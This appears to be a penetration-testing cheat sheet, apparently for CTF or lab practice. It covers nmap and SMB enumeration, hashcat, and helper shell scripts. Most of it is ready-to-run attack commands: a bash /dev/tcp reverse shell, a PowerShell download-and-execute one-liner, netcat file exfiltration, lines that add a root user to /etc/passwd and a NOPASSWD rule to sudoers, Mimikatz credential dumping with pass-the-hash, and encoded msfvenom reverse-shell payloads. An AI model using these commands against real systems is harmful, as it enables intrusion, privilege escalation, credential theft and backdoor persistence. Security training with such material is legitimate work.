# Disboard #

Quick Guide

List of Commands


Last updated 1 year ago

NMAP

Full TCP: sudo nmap -Pn -A -p- -T4 $IP -oN tcp-scan.txt

UDP: sudo nmap -sUV -F -T4 $IP -oN udp-scan.txt

(nmap rejects a bare -o; use -oN for normal output, -oG for grepable, -oA for all three formats.)

HTTP: sudo nmap -Pn -T4 -p 80 --script=http-enum $IP

SMB: sudo nmap -Pn -T4 --script 'smb-vuln*' -p 139,445 $IP

SMB Enum: sudo nmap -Pn -T4 --script=smb-enum-shares.nse -p 445 $IP

Enumerate given ports: sudo nmap -Pn -sC -sV -p $PORTS $IP -oN enum-scan.txt

Network (host discovery; any of the three target notations works): nmap -sn 10.10.10.1/24, nmap -sn 10.10.11.1-253, nmap -sn '10.10.12.*' (quote the wildcard so the shell does not expand it)
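The full-port scan above is normally followed by the "Enumerate given ports" scan, and copying the open ports into $PORTS by hand is error-prone. The following is an added example (not part of the original page) that parses nmap's grepable (-oG) output into that comma-separated list and builds the second-stage command. The scan text embedded in it is constructed for the example, not a real capture, and the output file name enum-scan.txt is an assumption.

```shell
# Added example: turn an nmap -oG result into the $PORTS list for the follow-up scan.
# SAMPLE_GNMAP is a constructed single-host "nmap -p- -oG" result, not real scan data.
SAMPLE_GNMAP='# Nmap 7.94 scan initiated Mon Jan  1 00:00:00 2024 as: nmap -p- -oG tcp-scan.gnmap 10.10.10.5
Host: 10.10.10.5 ()    Status: Up
Host: 10.10.10.5 ()    Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 139/filtered/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///    Ignored State: closed (65531)
# Nmap done at Mon Jan  1 00:01:00 2024 -- 1 IP address (1 host up) scanned in 60.00 seconds'

# open_ports <gnmap-text>: print the open TCP ports of a single-target scan as "22,80,445".
# Only "open" entries are kept; filtered/closed ports are dropped.
open_ports() {
    printf '%s\n' "$1" \
      | grep '^Host:.*Ports:' \
      | sed -e 's/.*Ports: //' -e 's/[[:space:]]*Ignored State.*//' \
      | tr ',' '\n' \
      | awk -F/ '$2 == "open" { sub(/^ */, "", $1); print $1 }' \
      | sort -n | uniq | paste -sd, -
}

# followup_scan_cmd <ip> <gnmap-text>: print the second-stage nmap command line,
# or fail (status 1) when no open port could be parsed, so nothing runs blindly.
followup_scan_cmd() {
    ip=$1
    ports=$(open_ports "$2")
    [ -n "$ports" ] || { echo "no open ports parsed from scan output" >&2; return 1; }
    printf 'sudo nmap -Pn -sC -sV -p %s %s -oN enum-scan.txt\n' "$ports" "$ip"
}

# Usage against a real scan (assumed file name tcp-scan.gnmap):
#   sudo nmap -Pn -p- -T4 10.10.10.5 -oG tcp-scan.gnmap
#   eval "$(followup_scan_cmd 10.10.10.5 "$(cat tcp-scan.gnmap)")"
open_ports "$SAMPLE_GNMAP"                     # → 22,80,445
followup_scan_cmd 10.10.10.5 "$SAMPLE_GNMAP"
```

The grepable format puts every port of a host on one "Host: ... Ports:" line, which is why a single grep/sed pass is enough; for a multi-host scan run the function once per host line, otherwise the port lists of different hosts are merged.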

SAMBA

Tool smbmap:

  • smbmap -H $TARGET

Tool enum4linux:

  • enum4linux -a $TARGET

Tool smbclient:

  • smbclient -L $TARGET -N

  • smbclient //$TARGET/$DRIVE -U guest

Tool crackmapexec:

  • crackmapexec smb $TARGET -u 'guest' -p '' --rid-brute

MySQL: mysql -h $TARGET -u $USER -p"$PASS" (no space after -p; with a space mysql prompts for the password and treats $PASS as the database name)

SQSH: sqsh -S $TARGET -U $USER -P "$PASS" (password is capital -P)

DIRSEARCH

python3 dirsearch.py -e txt,html,php,sh -w $WORDLIST -t 10 -u $IP

BANNERS

nc -nv $IP $PORT

ESCAPE SHELLS

Python: python3 -c 'import pty;pty.spawn("/bin/bash")' (use python if only python2 is installed)

Echo (when your input is evaluated by a Python interpreter): echo os.system('/bin/bash')

Bash: /bin/bash -i

ENV: SHELL=/bin/bash script -q /dev/null

REVERSE SHELLS

Bash: /bin/bash -c 'bash -i >& /dev/tcp/$IP/$PORT 0>&1'

HASHCAT

Run: sudo hashcat -m $TYPE -a 0 $HASHFILE $WORDLIST -O (-O selects optimized kernels, which cap candidate length; drop it if the password may be long)

Show: sudo hashcat -m $TYPE $HASHFILE --show
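The -m $TYPE value has to match the hash format, and the cheat sheet leaves choosing it to the reader. The following is an added example (not from the original page) that picks the hashcat mode from the shape of a hash and prints the matching "Run:" line. The mode numbers are hashcat's own; the sample hashes in the usage lines are constructed dummy strings, not real credentials, and the file names hashes.txt and rockyou.txt are assumptions.

```shell
# Added example: choose the hashcat -m value from the hash format.
# is_hex <len> <string>: true when the string is exactly <len> hex characters
is_hex() { printf '%s' "$2" | grep -Eqi "^[0-9a-f]{$1}\$"; }

# hashcat_mode <hash>: print "MODE NAME"; print "? unknown" and return 1 if unrecognised
hashcat_mode() {
    h=$1
    case "$h" in
        '$1$'*)                    echo "500 md5crypt" ;;
        '$5$'*)                    echo "7400 sha256crypt" ;;
        '$6$'*)                    echo "1800 sha512crypt" ;;
        '$2a$'*|'$2b$'*|'$2y$'*)   echo "3200 bcrypt" ;;
        *::*:*:*:*)                echo "5600 NetNTLMv2" ;;   # user::DOMAIN:challenge:proof:blob
        *)
            # Raw digests are only distinguishable by length; 32 hex is MD5 or NTLM,
            # so the source of the hash (SAM/NTDS vs. a web app) decides between 0 and 1000.
            if   is_hex 32  "$h"; then echo "0 MD5 (32 hex, could also be 1000 NTLM)"
            elif is_hex 40  "$h"; then echo "100 SHA1"
            elif is_hex 64  "$h"; then echo "1400 SHA256"
            elif is_hex 128 "$h"; then echo "1700 SHA512"
            else echo "? unknown"; return 1
            fi ;;
    esac
}

# hashcat_cmd <hashfile> <wordlist> <sample-hash>: print the Run line with -m filled in
hashcat_cmd() {
    mode=$(hashcat_mode "$3") || return 1
    mode=${mode%% *}
    printf 'sudo hashcat -m %s -a 0 %s %s -O\n' "$mode" "$1" "$2"
}

# Usage with constructed dummy hashes (not real credentials):
hashcat_mode '$6$saltsalt$abcdefghijklmnop'                      # → 1800 sha512crypt
hashcat_mode 'admin::CORP:1122334455667788:aabbccdd:0101000000'   # → 5600 NetNTLMv2
hashcat_cmd hashes.txt rockyou.txt '$1$xyz$abcdefghijklmnop'      # → sudo hashcat -m 500 -a 0 hashes.txt rockyou.txt -O
```

Feed the function the first line of $HASHFILE before running hashcat; if it reports unknown, identify the format manually rather than guessing, since a wrong mode either errors out or silently never cracks.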

ROOT

Passwd: echo 'r00t:0Wna/pt5B0TzM:0:0:r00t:/root:/bin/bash' >> /etc/passwd (adds a uid-0 user; the hash field is a crypt() hash, so generate your own with openssl passwd -1 '<password>' rather than relying on the one shown)

Sudoers: echo "user ALL=(ALL:ALL) NOPASSWD: ALL" >> /etc/sudoers

Find:

echo "r00t:password" > /tmp/newpass.txt
sudo find . -name "." -exec useradd r00t -ou 0 -g root -s /bin/bash \;
sudo find . -name "." -exec chpasswd < /tmp/newpass.txt \;

TRANSFER & SHARE

Netcat:

  • Receiver: nc -nvlp $PORT > $FILE

  • Giver: nc $IP $PORT < $FILE

Python:

  • Host: python3 -m http.server $PORT

  • Client: wget http://$IP:$PORT/$FILE -O $FILE

Powershell:

  • Execute remote program: powershell iex(new-object net.webclient).downloadString('http://$IP:$PORT/$FILE')

  • Download remote file: powershell invoke-webrequest -uri "http://$IP/$FILE" -outfile "$FILE"

Samba:

  • Start sharing: sudo smbserver.py -smb2support share . (impacket; -smb2support is needed for Windows clients that refuse SMB1)

  • Copy: copy \\$IP\share\$FILE $FILE

LINUX QUICK

Find: find / -iname "*$PATTERN*" -print 2>/dev/null

Grep: grep -iRl "$PATTERN" . 2>/dev/null

Versions:

# system distribution (os)
lsb_release -a
cat /etc/issue
cat /etc/os-release
# kernel information
uname -a
cat /proc/version

Network:

# listening sockets with owning process (ss replaces netstat where it is missing)
netstat -tulpn
ss -tulpn
# processes
ps aux
ps aux | grep root

Searching:

# check webpage
ls -lisa /var/www/html
# check config files
ls -lisa /etc/ | grep '\.conf'
# find all suid programs owned by root
find / -user root -perm -4000 -print 2>/dev/null
# world writable directories
find / -writable -type d 2>/dev/null
find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root
# world writable files
find / -perm -2 -type f 2>/dev/null | grep -v "^/proc"
find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null
# search for private keys (RSA, OpenSSH, EC and DSA PEM headers)
find / -xdev -type f -print0 2>/dev/null | xargs -0 grep -lE "BEGIN (RSA |OPENSSH |EC |DSA )?PRIVATE KEY" 2>/dev/null

SUID:

# adds the suid bit to a binary (you must own it, i.e. usually be root)
chmod u+s /bin/executable
# restores a standard PATH (useful after escaping a restricted shell or cron job)
export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

Ping Sweep:

# linux
for i in {1..254}; do (ping -c 1 10.10.10.$i | grep "bytes from" &); done
# windows cmd (double the % signs inside a .bat file)
for /L %i in (1,1,255) do @ping -n 1 -w 200 10.10.10.%i | find "TTL=" > nul && echo 10.10.10.%i is up.

WINDOWS QUICK

RDP: xfreerdp /u:$USER /p:$PASS /v:$HOST:$PORT /drive:$PATH /dynamic-resolution +clipboard

Upgrade Shell: system("start cmd.exe /k $SHELL")

Basic Cmds:

# hostname
hostname
# user info
echo %username%
whoami
whoami /priv
# user info from a meterpreter session (not a cmd.exe command)
getuid
# all user info
net users
net users Administrator
# firewall (netsh firewall is deprecated; advfirewall is the current form)
netsh firewall show state
netsh firewall show config
netsh advfirewall show allprofiles
# scheduled tasks
schtasks /query /fo LIST /v
# services
net start
wmic service list brief
tasklist /SVC
# versions
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
# os version (legacy file, absent on current builds)
type c:\windows\system32\eula.txt
# network
ipconfig /all & route print & arp -a
# connections
netstat -aton
# searching
dir /S /B $FILE
# grepping
findstr /spin /c:"$PATTERN" $FILE
findstr /S /I /M /C:"$PATTERN" *.*

Exploit Suggester:

systeminfo
# take output and put into systeminfo.txt
python windows-exploit-suggester.py --database 2020-09-27-mssb.xls --systeminfo systeminfo.txt

Mimikatz:

./mimikatz.exe
	privilege::debug          # needs a local admin / SeDebugPrivilege context
	sekurlsa::logonpasswords
# pass the recovered NTLM hash straight to WinRM
evil-winrm -i $TARGET -u Administrator -H $NTLM

COMPILING C

# compiling c
gcc exploit.c -o exploit
# including pthread
gcc -pthread exploit.c -o exploit
# specific architecture (gcc-multilib)
sudo apt-get install gcc-multilib
gcc -m32 exploit.c -o exploit
gcc -m64 exploit.c -o exploit
# compiling to exe for different architecture
sudo apt-get install mingw-w64
i686-w64-mingw32-gcc exploit.c -o exploit.exe -lws2_32

MSFVENOM

Most used examples:

# windows encoded reverse tcp shell
msfvenom -p windows/shell/reverse_tcp LHOST=$IP LPORT=$PORT -e shikata_ga_nai -i 3 -f exe > shell.exe
# windows encoded meterpreter reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$PORT -e shikata_ga_nai -i 3 -f exe > encoded.exe
# war file
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$IP LPORT=$PORT -f war > shell.war
# metasploit handler (set payload to the same one baked into the msfvenom binary)
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost $IP
set lport $PORT
run

The following was used for a B0F challenge:

# compiling as exe for meterpreter reverse tcp shell
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=1337 -e x86/shikata_ga_nai -f exe -o exploit.exe